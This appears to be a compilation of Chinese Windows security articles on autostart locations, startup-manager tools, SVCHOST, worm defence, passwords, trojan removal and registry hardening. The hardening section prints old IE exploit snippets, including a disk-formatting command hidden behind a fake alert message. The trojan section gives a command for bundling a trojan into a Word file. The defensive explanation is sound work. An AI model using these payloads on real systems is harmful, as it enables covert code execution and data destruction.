　　使用“记事本”打开System.ini文件，找到[boot]段下“shell=”语句，该语句默认为“shell=Explorer.exe”，启动的时候运行Windows外壳程序explorer.exe。病毒可不客气，如“妖之吻”病毒干脆把它改成“shell=c:/yzw.exe”，如果你强行删除“妖之吻”病毒程序yzw.exe，Windows就会提示报错，让你重装Windows，吓人不？也有客气一点的病毒，如将该句变成“shell=Explorer.exe 其他程序名”，看到这样的情况，后面的其他程序名一定是病毒程序如所示。
　　3.wininit.ini
　　wininit.ini文件是很容易被许多电脑用户忽视的系统配置文件，因为该文件在Windows启动时自动执后会被自动删除，这就是说该文件中的命令只会自动执行一次。该配置文件主要由软件的安装程序生成，对那些在Windows图形界面启动后就不能进行删除、更新和重命名的文件进行操作。若其被病毒写上危险命令，那么后果与“C盘杀手”无异。
　　小提示
　　★如果不知道它们存放的位置，按F3键打开“搜索”对话框进行搜索；
　　★单击“开始→运行”，输入sysedit回车，打开“系统配置编辑程序”，如图2所示，在这里也可以方便的对上述文件进行查看与修改。
五、智能的启动——开/关机/登录/注销脚本
　　在Windows 2000/XP中，单击“开始→运行”，输入gpedit.msc回车可以打开“组策略编辑器”，在左侧窗格展开“本地计算机策略→用户配置→管理模板→系统→登录”，然后在右窗格中双击“在用户登录时运行这些程序”，单击“显示”按钮，在“登录时运行的项目”下就显示了自启动的程序。
六、定时的启动——任务计划
　　在默认情况下，“任务计划”程序随Windows一起启动并在后台运行。如果把某个程序添加到计划任务文件夹，并将计划任务设置为“系统启动时”或“登录时”，这样也可以实现程序自启动。通过“计划任务”加载的程序一般会在任务栏系统托盘区里有它们的图标。大家也可以双击“控制面板”中的“计划任务”图标查看其中的项目。
　　小提示
　　“任务计划”也是一个特殊的系统文件夹，单击“开始→程序→附件→系统工具→任务计划”即可打开该文件夹，从而方便进行查看和管理。
　　七、跟着别人的启动——随软件开启的程序
　　随MyIE2启动的程序，详见本刊2004年第3期、4期《让你受用终生的浏览器─MyIE2实用技巧大放送》一文。
下篇 全方位作战
　　　　彻底清查Windows自启动
　　一、从“系统信息”查看启动程序
　　单击“开始→程序→附件→系统工具→系统信息”，双击“软件环境”，单击“启动程序”，在右边窗口出现的程序就是所有自启动程序，在“装载源”或“位置”下显出该程序是由注册表还是“启动”文件夹启动的。从这里只能查看自启动程序，不能对自启动程序进行禁止自启动等任何更改操作。
软件性质： Windows自身功能
推荐指数： ★★★★
二、MSConfig
　　在Windows 98/Me/XP/2003中，单击“开始→运行”，输入msconfig回车即可打开“系统配置实用程序”窗口，单击“启动”标签，在列表框中显示的就是从注册表、“启动”文件夹和系统配置文件中自启动的程序。程序前有对号的是允许自启动的程序，没有对号的则不会自启动。如果想取消某个程序的自启动，单击取消程序前的对勾即可。还可以在autoexec.bat、system.ini和win.ini标签里面对它们进行编辑，取消其中的自启动程序。
　　小提示
　　★所有的修改都需要重新启动才能生效。
　　★Windows 2000没有msconfig程序，但是我们可以从Windows 98或者XP拷贝一个到system32目录，同样可以起作用。
软件性质： 免费，微软原装
推荐指数： ★★★★
　　三、startup.cpl
　　只需要将startup.cpl文件拷贝到Windows安装目录下的system32文件夹下面即可，单击“开始→设置→控制面板”打开控制面板，你会发现里面多了一个Startup项，双击打开它，在打开的对话框中，可以方便地对“启动”文件夹和注册表中的启动项目进行管理，如右击空白处新建一个启动项，右击已有的启动项目可以对其进行编辑、删除、禁用和立刻运行等操作。
软件性质： 免费，绿色软件
推荐指数： ★★★★★
　　四、StartupMonitor
　　双击StartupMonitor.msi执行安装，安装完成后，它就乖乖的在后台运行，只占据100多KB的内存，什么时候才显示出它的本事呢？当你安装了一个软件的时候，如果它想自己偷偷自启动，嘿嘿，就必须通过StartupMonitor的这一关，如所示，它管得非常宽，无论是什么程序，它都不放过！渔歌强烈推荐。
软件性质： 免费，小巧实用
推荐指数： ★★★★★
　　五、StartStop
　　软件安装后它会将自己加到注册表的RunOnce自启动，启动后会自动缩小到托盘区一个小图标，双击即可打开StartStop主界面，在这里列出了本机启动程序，右击某个程序可以选择总是启动、从不启动还是每次询问是否启动，如所示，它有特色的一个地方是单击菜单“Options→Startup delay”，可以设置启动时延迟多少时间启动程序。
软件性质： 免费， 有特色
推荐指数： ★★★★
　　六、Autoruns
　　下载autoruns.zip后解压缩直接执行里面的autoruns.exe即可，由于它不会在启动时加载，显得更绿色。双击autoruns.exe打开程序界面，它不仅仅列出的是非常全的启动项，而且详细地列出了启动程序的公司和路径，如果还不满意，右击某个启动项目，选择属性，可以查看该启动项的文件属性。它还有两个特色功能，一个是右击任何一个启动项，选择Jump to就会立刻跳转到具体的位置，如跳转到注册表的具体键值、打开启动文件夹、打开INI文件等，非常方便！还有一个功能是单击View菜单，可以切换是否显示所有的启动位置、是否显示启动的服务、是否只显示非Microsoft公司的项目，这对于检查启动项目和过滤项目非常有用。
软件性质： 免费，绿色软件
推荐指数： ★★★★★
　　七、StartUp Organizer
　　Startup Organizer的组织和管理自启动项功能很强大，它在控制启动项目方面做的也比较细，如为某个启动设定声音提示，还能设置在Windows启动时按某个键来控制某些程序启动与否，还可以备份自启动配置文件以便应急恢复、比较启动程序的变化、恢复第一次运行时的默认配置，操作也比较简单，遗憾之处就是不是免费的。
软件性质： 共享软件，30天免费试用
网络安全不变之法则：五大手段确保高枕无忧
写下你的安全策略
　　出色的安全性不可能一蹴而就。如果你的企业文化趋向于凡事都不正规，要想达到出色的安全性基本上就只有靠运气。要想获得最好的企业安全，必须经过坚持不懈的努力，以及强大的决心。每个公司都需要一个安全策略。不要等到发生入侵之后才想起来制定这个策略；现在就开始制定一个，才能防患于未然。请访问WatchGuard的Security Awareness网站，上面提供了一份免费的白皮书，它描述了如何拟定您的策略（PDF），同时省去昂贵的专家咨询费用或者长达几个季度的自行摸索。
　　2. 防火墙必不可少
　　令人吃惊的是，现在许多组织（最典型就是大学）都在运行着没有防火墙保护的公共网络。让我们姑且忽略有关“硬件防火墙好，还是软件防火墙好”的争论，无论采用哪一种防火墙，总比没有防火墙好。这里的重点在于，连接到Internet的每一个人都需要在其网络入口处采取一定的措施来阻止和丢弃恶意的网络通信。当你读到本文的时候，说明您已经有了一个企业防火墙。但是，不要忘了您的远程办公人员和移动用户。最低限度也应该为他们每个人配备一个个人防火墙。虽然Windows XP SP2自带的防火墙也勉强可用，但为了满足您的特殊需要，市场上还存在着大量产品可供挑选。最主要的事情就是去使用它们。
　　3. 随时更新桌面防病毒系统
　　有趣的是，1999年我们鼓励用户“每周”检查一次防病毒更新。如今，各个厂商都提供了自动的签名更新。只要你一直都连在Internet上，它们就能在一个新的安全威胁被发现后的数小时内下载到您的机器上。但基本的道理是一样的：良好的安全性要求你在每个桌面都配备防病毒功能，并随时更新它。虽然在一个网络的网关那里建立防病毒机制能解决一部分问题，但在整个防病毒战线中，您只能把网关防病毒视为一道附加的防线，而不能把它视为桌面防病毒的一个替代品。
　　4. 强化您的服务器
　　“强化”（Hardening）涉及两个简单的实践法则：购买商业软件时，删除您不需要的所有东西；如果不能删除，就把它禁用。可以通过强化来删除的典型对象包括示例文件、使用向导演示、先用后付费的捆绑软件以及在可以预见的将来不准备使用的高级特性。安装越复杂，越有可能留下安全隐患，所以将您的安装精简到不能再精简的程度。除此之外，设备和软件通常配置了默认用户名/密码访问、来宾（guest）和匿名帐户以及默认共享。删除你不需要的，并修改所有身份验证凭据的默认值（由于有像这样的列表，所以黑客也知道它们）。在这个充斥着大量“臃肿件”（bloatware）的年代，这个实践法则与5年前相比更重要了。
　　5. 补丁策略必不可少
　　2001年，当“红色代码”（Code Red）浮现的时候，它攻击的一个漏洞，是Microsoft在9个月前就提供了免费补丁以便用户修补的。但是，这个蠕虫仍然快速和大面积地蔓延，原因是管理员们没有下载和安装这个补丁。今天，从一个新的漏洞被发现开始，到新的大规模攻击工具问世为止，两者间隔时间已经缩短了许多。在厂商发布安全补丁的时候，IT管理员需要做出快速响应。补丁管理目前是最热门的IT主题之一，但是和许多事情一样，80/20规则在这里仍然适用。如果没有商业评估工具以及较多的预算，可以用已经淘汰掉的“太慢”的机器来组建一个小的测试网络。这样一来，只需使用企业级工具来建立一个专业实验室所需的20%的付出，就能获得一个80%有用的测试环境。Microsoft，Apple以及其他许多组织都基本上每个月提供一次安全补丁。访问和安装那些补丁应该成为您的工作内容和计划任务的一部分。不要事后才采取行动。
　　听起来很简单，是吗？您知道真正做起来要比本文讲的难得多。但是，在这个充满不确定因素的世界中，掌握一些已知不变的基本经验法则，您将始终有一个准则，把它们当作您工作中的依托。在您产生任何疑虑的时候，请根据它们来整理自己的思路。在未来的1000篇WatchGuard安全电子邮件中，它们将指导我们一直按照正确的路线前进！
剖析进程中SVCHOST的作用和原理
走进SVCHOST
　　SVCHOST进程现在是声名狼藉，本来Windows用它来启动各种服务，可是偏偏病毒、木马也想尽办法来利用它，企图利用它的特性来迷惑用户，达到感染、入侵、破坏的目的(如冲击波变种病毒“W32.Welchia.Worm”)，弄的大家草木皆兵一见有SVCHOST就怀疑自己是否已经中招，其实Windows系统存在多个SVCHOST进程是很正常的，在受感染的机器中到底哪个是病毒进程呢？这里仅举一例来说明。
　　假设Windows XP系统被“W32.Welchia.Worm”感染了。正常的SVCHOST文件存在于“C:/Windows/system32”目录下，如果发现该文件出现在其他目录下就要小心了。“W32.Welchia.Worm”病毒存在于“C:/Windows/system32/wins”目录中，因此使用进程管理器查看SVCHOST进程的执行文件路径就很容易发现系统是否感染了病毒。Windows系统自带的任务管理器不能够查看进程的路径，可以使用第三方进程管理软件，如“Windows优化大师”进程管理器，通过这些工具就可很容易地查看到所有的SVCHOST进程的执行文件路径，一旦发现其执行路径为不平常的位置就应该马上进行检测和处理。
　　在基于NT内核的Windows操作系统家族中，不同版本的Windows系统，存在不同数量的“SVCHOST”进程，用户使用“任务管理器”可查看其进程数目。一般来说，Win2000有两个SVCHOST进程，WinXP中则有四个或四个以上的SVCHOST进程(以后看到系统中有多个这种进程，千万别立即判定系统有病毒了哟)，而Win2003 server中则更多。这些SVCHOST进程提供很多系统服务，如：RpcSs服务(Remote Procedure Call)、dmserver服务(Logical Disk
Manager)、Dhcp服务(DHCP Client)等。
　　如果要了解每个SVCHOST进程到底提供了多少系统服务，可以在Win2000的命令提示符窗口中输入“Tlist -S”命令来查看，该命令是Win2000 Support Tools提供的。在WinXP则使用“tasklist /svc”命令。
　　深入分析SVCHOST
　　Windows系统进程分为独立进程和共享进程两种，“SVCHOST.EXE”文件存在于“%SystemRoot%/system32/”目录下，它属于共享进程。随着Windows系统服务不断增多，为了节省系统资源，微软把很多服务做成共享方式，交由SVCHOST.EXE进程来启动。但SVCHOST进程只作为服务宿主，并不能实现任何服务功能，即它只能提供条件让其他服务在这里被启动，而它自己却不能给用户提供任何服务。那这些服务是如何实现的呢？
　　原来这些系统服务是以动态链接库(DLL)形式实现的，它们把可执行程序指向SVCHOST，由SVCHOST调用相应服务的动态链接库来启动服务。那SVCHOST又怎么知道某个系统服务该调用哪个动态链接库呢？这是通过系统服务在注册表中设置的参数来实现。下面就以RpcSs(Remote Procedure Call)服务为例，进行讲解。实例：笔者以Windows XP为例，点击“开始”/“运行”，输入“services.msc”命令，弹出服务对话框，然后打开“Remote Procedure Call”属性对话框，可以看到RpcSs服务的可执行文件的路径为“C:/WINDOWS/system32/svchost
-k rpcss”，这说明RpcSs服务是依靠SVCHOST调用“rpcss”参数来实现的，而参数的内容则是存放在系统注册表中的。
　　在运行对话框中输入“regedit.exe”后回车，打开注册表编辑器，找到[HKEY_LOCAL_MACHINE/ SYSTEM/CurrentControlSet/Services/RpcSs]项，找到类型为“REG_EXPAND_SZ”的键“magePath”，其键值为“%SystemRoot%/system32/svchost -k rpcss”(这就是在服务窗口中看到的服务启动命令)，另外在“Parameters”子项中有个名为“ServiceDll”的键，其值为“%SystemRoot%/system32/rpcss.dll”，其中“rpcss.dll”就是rpcss服务要使用的动态链接库文件。这样SVCHOST进程通过读取“RpcSs”服务注册表信息，就能启动该服务了。
防止网络蠕虫病毒的技巧以及策略
每一次蠕虫的爆发都会给社会带来巨大的损失。2001 年9 月18 日，Nimda 蠕虫被发现，对Nimda 造成的损失评估数据从5 亿美元攀升到26 亿美元后，继续攀升，到现在已无法估计。目前蠕虫爆发的频率越来越快，尤其是近两年来，越来越多的蠕虫（如冲击波、振荡波等）出现。对蠕虫进行深入研究，并提出一种行之有效的解决方案，为企业和政府提供一个安全的网络环境成为我们急待解决的问题。
什么是蠕虫
Internet 蠕虫是无须计算机使用者干预即可运行的独立程序，它通过不停地获得网络中存在漏洞的计算机上的部分或全部控制权来进行传播。
蠕虫与病毒的最大不同在于它不需要人为干预，且能够自主不断地复制和传播。蠕虫程序的工作流程可以分为漏洞扫描、攻击、传染、现场处理四个阶段。蠕虫程序扫描到有漏洞的计算机系统后，将蠕虫主体迁移到目标主机。然后，蠕虫程序进入被感染的系统，对目标主机进行现场处理。现场处理部分的工作包括：隐藏、信息搜集等。不同的蠕虫采取的IP生成策略可能并不相同，甚至随机生成。各个步骤的繁简程度也不同，有的十分复杂，有的则非常简单。
蠕虫的行为特征包括：
·自我繁殖：
·利用软件漏洞：
·造成网络拥塞：
·消耗系统资源：
·留下安全隐患：
蠕虫的工作方式归纳如下：随机产生一个IP 地址；判断对应此IP 地址的机器是否可被感染；如果可被感染，则感染之；重复1～3 共m 次，m 为蠕虫产生的繁殖副本数量。
如何检测蠕虫
由以上的分析可知，尽早地发现蠕虫并对感染蠕虫的主机进行隔离和恢复，是防止蠕虫泛滥、造成重大损失的关键。
目前国内并没有专门的蠕虫检测和防御系统，传统的主机防病毒系统并不能对未知的蠕虫进行检测，只能被动地对已发现的特征的蠕虫进行检测。而且目前市场上的入侵检测产品，对蠕虫的检测也多半是基于特征，所以我们利用ids提供的异常检测功能，通过发现网络中的异常，来对蠕虫的传染进行控制。虽然有些事后诸葛的嫌疑，但只要发现及时，还是能大大减少蠕虫造成的损失。
在对未知蠕虫的检测方面，入侵检测在对流量异常的统计分析和对tcp连接异常的分析基础上，又使用了对ICMP数据异常分析的方法，可以更全面地检测网络中的未知蠕虫。这种网络蠕虫的检测技术是Bob Gray，具体实现过程是：当一台主机向一个不存在的主机发起连接时，中间的路由器会产生一个ICMP-T3（目标不可达）包返回给蠕虫主机。
这种方法可以检测出具有高速、大规模传染模型的网络蠕虫。（很难检测针对某个网络传播的特定的蠕虫和慢速传播的蠕虫。这两种蠕虫，可以认为对整个网络来说，它们的危害比较小）。
全方位的蠕虫防治策略
当蠕虫被发现时，要在尽量短的时间内对其进行响应。首先产生报警，通知管理员，并通过防火墙、路由器、或者HIDS的互动将感染了蠕虫的主机隔离；然后对蠕虫进行分析，进一步制定检测策略，尽早对整个系统存在的不安全隐患进行修补，防止蠕虫再次传染，并对感染了蠕虫的主机进行蠕虫的删除工作。
对于感染了蠕虫的主机时，其防治策略是这样的：
1.与防火墙互动：通过控制防火墙的策略，对感染主机的对外访问数据进行控制，防止蠕虫对外网的主机进行感染。
2.交换机联动：通过SNMP协议进行联动，当发现内网主机被蠕虫感染时，可以切断感染主机同内网的其他主机的通讯，防止感染主机在内网的大肆传播。
3.通知HIDS（基于主机的入侵监测）：装有HIDS的服务器接收到监测系统传来的信息，可以对可疑主机的访问进行阻断，这样可以阻止受感染的主机访问服务器，使服务器上的重要资源免受损坏。
4.报警：产生报警，通知网络管理员，对蠕虫进行分析后，可以通过配置Scaner来对网络进行漏洞扫描，通知存在漏洞的主机到Patch服务器下载补丁进行漏洞修复，防治蠕虫进一步传播。
密码设置的秘诀
现在大多数电脑用户都有许多密码，有的用于email，有的用于银行结算，有的用于自己钟爱的分销店会员注册，还有的用于……要记住所有这些注册码和密码实非易事，而我们却因为需要，还在不断设立新的密码。为了让我们所设立的这些密码都是非常容易记忆 的，我们不得不选择的做法是遵从简单、易背的原则。现在，赛门铁克告诉您，我们面临的挑战是创建一个防黑客密码，如果您按上面的原则做了，就恰好陷入了黑客的陷阱！
　　为了让您走出设立密码的误区，远离黑客，以下是一些来自网络安全专家赛门铁克的设立防黑客密码的秘诀。在一般情况下，建议您设立密码时：
　　* 使用大写字母和小写字母、标点和数字的集合
　　* 在不同账号里使用不同的密码
　　* 有规律的更换密码。为了容易记起要更换密码，将它和一件事联系起来。例如在每月的第一天或发薪日更换密码。
　　* 密码至少要6个字符。您的密码字符数越多，就越难被查出。
　　* 使用一个方便您记忆的密码，那么您便不必写下来了。
　　密码选择使用以下指导来避免遭受攻击：
　　* 不要使用和您有关的姓名和数字，如出生日期或是绰号
　　* 不要以任何形式使用您的用户名或是注册名
　　* 不要使用您的名字，或是家庭成员或宠物的名字
　　* 不要使用任何语言的单个字作为密码
　　* 不要使用“密码”（“password”）作为密码
　　* 不要使用可轻易获得的关于您的信息。这包括执照号码、电话号码、社会安全号码、您的手机号码、您所居住的街道的名字，等等。
这么多的建议和“不要”原则，如此说来，您也许会问，按照上述建议设立的密码是否将十分复杂，且难于记忆？先不必着急，下面将告诉您——
　　如何记住您的密码
　　密码应随时记住且不可写下来。您可以使用一些工具来帮助您选择一个易于记忆，但是仍然很难被窃取的密码。
　　* 选出一句歌词，使用句中每一单词的第一个字母，将只取首字母的缩写词作为密码。
　　* 选择两个没有任何共同点的短词，将他们用标点或数字连接起来，如“moss9desk”。
　　* 使用一个熟悉的短语，但是要用数字“0”来代替字母“O”，诸如此类。
　　尽管说了这么多便于记忆且难于被黑客攻破的密码设立原则，但要是真“一时兴起”，给忘了怎么办？别急，下面赛门铁克还将交您——
　　密码如何存储
　　如果您觉得在头脑里分门别类地记住各种各样的密码很繁琐的话，那么有一些方式可以帮您记忆您的密码。其中一些甚至允许您即使是在路上或是使用不同的电脑时也可访问您所存储的密码。
　　* 密码存储软件
　　有很多种程序，如桌面软件密码解决方案，它可使您存储所有注册名和密码，并只须使用您记忆最深刻的一个密码便可访问其余那些。一些程序将您的密码加密，如此便防止密码被偷看。桌面软件密码解决方案的一个缺点是只有您在使用电脑并运行该程序的时候，您才能够访问您存储的密码。如果您仅是使用家用电脑来网上冲浪、在线购物和银行结算，这种方式值得借鉴。
　　* 在线密码存储
　　在线有很多种密码存储方式，无论您在世界的任何角落，只要您的电脑连接上了互联网，您就可以一天24小时连续访问您存储的用户名和密码。在线存储有很多方式还提供了128-bit加密技术，可确保人们在畅游网络时的密码安全。一些在线的存储站点能将您的密码存储在其服务器上，可能还不够安全。但为了做到安全预警，不少在线服务也能将您的密码存储在您的电脑中，那么密码将很少受到篡改。
　　* 在线图形密码存户
　　这种方式可使您轻松记住一个密码并能打开其余的密码。“密码”（“password”）实际上就是人们每一天行为的一系列图形展示，就像洗洗刷刷。您所要记住的一切就是用什么口令完成访问密码的动作。当您选择了一个很难被窃取的密码时，务必要确保密码的安全，且尽量使其安全性进一步提高。不要将您的密码email给任何人（永远不么干），如果有人打电话给您询问您的密码，千万不要告诉他们。另外，在公司内部，正式的IT职员应在访问系统之前得到授权。一旦您创建了一个很好的密码，您可用赛门铁克的“诺顿网络安全特警”来确保密码的安全。“诺顿网络安全特警”提供了针对病毒、黑客和机密威胁的全面防护功能。它对于使用互联网进行购物、银行结算、冲浪或通信的用户而言，是必不可少的。
自己动手清除电脑中的木马程序
首先查看自己的电脑中是否有木马
　　1、集成到程序中
　　其实木马也是一个服务器-客户端程序，它为了不让用户能轻易地把它删除，就常常集成到程序里，一旦用户激活木马程序，那么木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。绑定到某一应用程序中，如绑定到系统文件，那么每一次Windows启动均会启动木马。
　　2、隐藏在配置文件中?
　　木马实在是太狡猾，知道菜鸟们平时使用的是图形化界面的操作系统，对于那些已经不太重要的配置文件大多数是不闻不问了，这正好给木马提供了一个藏身之处。而且利用配置文件的特殊作用，木马很容易就能在大家的计算机中运行、发作，从而偷窥或者监视大家。不过，现在这种方式不是很隐蔽，容易被发现，所以在Autoexec.bat和Config.sys中加载木马程序的并不多见，但也不能因此而掉以轻心哦。
　　3、潜伏在Win.ini中
　　木马要想达到控制或者监视计算机的目的，必须要运行，然而没有人会傻到自己在自己的计算机中运行这个该死的木马。当然，木马也早有心理准备，知道人类是高智商的动物，不会帮助它工作的，因此它必须找一个既安全又能在系统启动时自动运行的地方，于是潜伏在Win.ini中是木马感觉比较惬意的地方。大家不妨打开Win.ini来看看，在它的[windows]字段中有启动命令“load=”和“run=”，在一般情况下“＝”后面是空白的，如果有后跟程序，比方说是这个样子：run=c:/windows/file.exe load=c:/windows/file.exe
　　这时你就要小心了，这个file.exe很可能是木马哦。
4、伪装在普通文件中
　　这个方法出现的比较晚，不过现在很流行，对于不熟练的windows操作者，很容易上当。具体方法是把可执行文件伪装成图片或文本----在程序中把图标改成Windows的默认图片图标, 再把文件名改为*.jpg.exe, 由于Win98默认设置是"不显示已知的文件后缀名",文件将会显示为*.jpg, 不注意的人一点这个图标就中木马了(如果你在程序中嵌一张图片就更完美了)。
　　5、内置到注册表中
　　上面的方法让木马着实舒服了一阵，既没有人能找到它，又能自动运行，真是快哉！然而好景不长，人类很快就把它的马脚揪了出来，并对它进行了严厉的惩罚！但是它还心有不甘，总结了失败教训后，认为上面的藏身之处很容易找，现在必须躲在不容易被人发现的地方，于是它想到了注册表！的确注册表由于比较复杂，木马常常喜欢藏在这里快活，赶快检查一下，有什么程序在其下，睁大眼睛仔细看了，别放过木马哦：HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion下所有以“run”开头的键值；HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion下所有以“run”开头的键值；HKEY-USERS/.Default/Software/Microsoft/Windows/CurrentVersion下所有以“run”开头的键值。
　　6、在System.ini中藏身
　　木马真是无处不在呀！什么地方有空子，它就往哪里钻！这不，Windows安装目录下的System.ini也是木马喜欢隐蔽的地方。还是小心点，打开这个文件看看，它与正常文件有什么不同，在该文件的[boot]字段中，是不是有这样的内容，那就是shell=Explorer.exe file.exe，如果确实有这样的内容，那你就不幸了，因为这里的file.exe就是木马服务端程序！另外，在System.ini中的[386Enh]字段，要注意检查在此段内的“driver=路径/程序名”，这里也有可能被木马所利用。再有，在System.ini中的[mic]、[drivers]、[drivers32]这三个字段，这些段也是起到加载驱动程序的作用，但也是增添木马程序的好场所，现在你该知道也要注意这里喽。
　　7、隐形于启动组中
　　有时木马并不在乎自己的行踪，它更注意的是能否自动加载到系统中，因为一旦木马加载到系统中，任你用什么方法你都无法将它赶跑（哎，这木马脸皮也真是太厚），因此按照这个逻辑，启动组也是木马可以藏身的好地方，因为这里的确是自动加载运行的好场所。动组对应的文件夹为：C:/windows/start menu/programs/startup，在注册表中的位置：HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/
Explorer/ShellFolders Startup="C:/windows/start menu/programs/startup"。要注意经常检查启动组哦！
　　8、隐蔽在Winstart.bat中
　　按照上面的逻辑理论，凡是利于木马能自动加载的地方，木马都喜欢呆。这不，Winstart.bat也是一个能自动被Windows加载运行的文件，它多数情况下为应用程序及Windows自动生成，在执行了Win.com并加载了多数驱动程序之后开始执行（这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知）。由于Autoexec.bat的功能可以由Winstart.bat代替完成，因此木马完全可以像在Autoexec.bat中那样被加载运行，危险由此而来。
9、捆绑在启动文件中
　　即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。
　　10、设置在超级连接中
　　木马的主人在网页上放置恶意代码，引诱用户点击，用户点击的结果不言而喻：开门揖盗！奉劝不要随便点击网页上的链接，除非你了解它，信任它，为它死了也愿意等等。
??下面再看木马的清除方法
??1、检查注册表中RUN、RUNSERVEICE等几项，先备份，记下可以启动项的地址， 再将可疑的删除。
??2、删除上述可疑键在硬盘中的执行文件。
??3、一般这种文件都在WINNT，SYSTEM，SYSTEM32这样的文件夹下，他们一般不会单独存在，很可能是有某个母文件复制过来的，检查C、D、E等盘下有没有可疑的.exe，.com或.bat文件，有则删除之。
??4、检查注册表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER/SOFTWARE/Microsoft/??Internet Explorer/Main中的几项（如Local Page），如果被修改了，改回来就可以。
??5、检查HKEY_CLASSES_ROOT/inifile/shell/open/command和??HKEY_CLASSES_ROOT/txtfile/shell/open/command等等几个常用文件类型的默认打开程序是否被更改。这个一定要改回来。很多病毒就是通过修改.txt，.ini等的默认打开程序让病毒“长生不老，永杀不尽”的。
??6、如果有可能，对病毒的母文件进行反汇编，比如我上次中的那个病毒，通过用IDA反汇编，发现它还偷窃系统密码并建立 %systemroot%/system/mapis32a.dll 文件把密码送到一个邮箱中，由于我用的是W2K，所以它当然没有得手。
　　至此，病毒完全删除！ 笔者建议有能力的话，时刻注意系统的变化，奇怪端口、可疑进程等等。 现在的病毒都不象以前那样对系统数据破坏很严重，也好发现的多，所以尽量自己杀毒（较简单的病毒、木马）。
修改注册表防范十大攻击
目前，针对Windows的攻击方式越来越多，除了黑客攻击手段越来越多，用户未能给系统及时打上补丁也是一个重要的原因。除了打补丁以外呢？我们还应该注意些什么呢？其实，在现有的条件下，修改注册表把其中的漏洞都堵上，也未尝不是一个好方法，本文讲述的正是这个问题，教你修改注册表防范十大攻击。
ActiveX漏洞防范方法 WORD执行木马漏洞防范方法
IE6的执行任何程序漏洞防范方法 IE的ActiveX控件被绕过漏洞防范方法
浏览网页硬盘被共享漏洞防范方法 防止LM散列被破解
防范共享入侵 禁止空连接
防范脚本病毒攻击 防范其他攻击
　　1、ActiveX漏洞防范方法
　　ActiveX漏洞主要针对IE5.5(含)及其以下版本，对OE、Outlook、Foxmail等也有着巨大的威胁。概况说来，就是把com.ms.activeX.ActiveXComponent对象嵌入&APPLET&标记可能导致任意创建和解释执行ActiveX对象，从而可以创建任意文件，运行程序，写注册表。举个例子，在嵌入com.ms.activeX.ActiveXComponent对象后，在IE的默认安全级别“中”状态下，打开包含以下脚本的HTML文件也会运行一个命令提示符，但没有任何警告。甚至还可以使程序在后台运行，这就要“归功”于嵌入的com.ms.activeX.ActiveXComponent对象了，正是它导演了这一幕！具体代码如下：
&APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&&/APPLET&
function runcmd()
a=document.applets[0];
a.setCLSID('');
a.createInstance();
wsh=a.GetObject();
wsh.Run('cmd.exe');//改为"wsh.Run('cmd.exe',false,1);"则程序在后台隐藏运行
setTimeout('runcmd()',10);
　　运行的结果会打开一个命令提示符，但整个运行过程中没有任何提示。如果你还没有意识到这有多么危险，那么请你注意了，如果我们把将上面的代码“wsh.Run('cmd.exe');”改为下面这两句（其它的不变）：
wsh.Run('start/m format.com d:/q/autotest/u');
alert('IMPORTANT : Windows is removing unused temporary files.');
　　这样做的结果又会怎么样呢？呵呵，你的D盘要被格式化了！听到硬盘狂响，大多数人会以为Windows正在移除临时文件，因为屏幕上显示：IMPORTANT: Windows is removing unused temporary files.，其实这是个幌子，用来欺骗我们的！此时在后台进行的是格式化硬盘命令！等到发觉则悔之晚矣……
　　修改注册表的防范方法：
　　禁用WSHShell对象，阻止运行程序。删除或更名系统文件夹中的wshom.ocx文件或删除注册表项：
HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/
2、WORD执行木马漏洞防范方法
　　利用WORD来隐藏木马是最近才流行起来的一种方法。方法是新建一个DOC文件，然后利用VBA写一段特定的代码，把文档保存为newdoc.doc，然后把木马程序这个DOC文件放在同一个目录下，运行如下命令：copy /b xxxx.doc+xxxxx.exe newdoc.doc把这两个文件合并在一起（在Word文档末尾加入木马文件），如图1所示只要别人点击这个所谓的Word文件就会中木马！其中，参数“/b”表示你所合并的文件为二进制格式的。如果是文本文件则加上参数“/a”，代表是ASCII格式。
　　不过，以上方法能得以实现的前提是你的WORD2000安全度为最低的时候才行，即HKEY_CURRENT_USER/Software/Microsoft/Office/9.0/Word/Security中的Level值必须是1或者0。大家知道，当Level值为3的时候（代表安全度为高），WORD不会运行任何宏；Level值为2时(安全度中)，WORD会询问你是否运行宏；Level值为1的时候(安全度低)，WORD就会自动运行所有的宏！聪明的你一定想到如果这个值为0的时候会怎么样？哈，如果设为0的话，WORD就会显示安全度为高，但却能自动运行任何的宏！是不是很恐怖啊？
　　要想把WORD的安全度在注册表中的值改为0，方法非常多，利用网页恶意代码修改浏览者的注册表就可以。我想这方面大家都有很多经验，就不多说了。对于这种欺骗方式，最重要的是小心防范，陌生人的附件千万不要收看！网上的链接也不要随意点击，如要点击请确认是否为.DOC文件，如是则一定不要直接点击查看！
　　3、IE6的执行任何程序漏洞防范方法
　　对于使用IE6.0的用户来说有个可怕的漏洞，该漏洞的存在导致可以在网页中执行任何程序，并可以绕过IE的ActiveX安全设置，即便你禁用ActiveX控件，网页中的恶意程序照样可以运行！举个例子，如果网页中含有下列代码，可以无声无息地执行你的记事本程序！想想看，如果这里不是记事本程序，换作其他的程序会怎么样？代码如下：
&body&&/body&
html='&OBJECT CLASSID="CLSID:" '
html+=' CODEBASE="c:/windows/notepad.exe"&&/OBJECT&';
/注意：上面的notepad.exe的路径请修改为你系统对应的路径document.body.innerHTML=
　　这个漏洞的主要原因是IE安全设置都是针对非本地的页面或交互的，对于本地的安全设置IE是最大信任的。如果你注意看IE的安全设置，都是对Internet和Intranet上WEB服务器而言的，根本就没有对本地文件的安全设置。概括说来就是IE对本地安全采用最大信任原则。
